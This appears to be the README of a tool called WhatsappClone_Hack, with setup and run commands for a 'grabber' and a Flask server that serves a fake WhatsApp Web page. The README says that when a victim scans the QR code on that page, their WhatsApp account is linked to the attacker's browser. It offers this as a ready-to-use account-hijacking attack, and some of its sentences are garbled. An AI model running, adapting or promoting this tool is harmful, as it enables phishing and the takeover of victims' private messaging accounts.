WhatsappClone_Hack
requirements
- Python >= 3.6.3
- Flask==1.0.2
- Selenium==3.7.0
- Gecko Driver
usage
clone the repo:
git clone https://github.com/CyberHackLord/WhatsappClone_Hack.git
install the requirements
cd path/to/the/repo
pip install -r requirements.txt
first, run the grabber
python3 grabber.py
then run the server
python3 server.py
as the victim scans the QR on the fake website, WhatsApp web on the browser spawned by the grabber will be connected to the victim's number.
Before usage:
- change the last line of the server.py content to meet your requirements (in the event that sudden spike in demand for port 80, you could have to run as a superuser)
- switch setup may essential (port guide)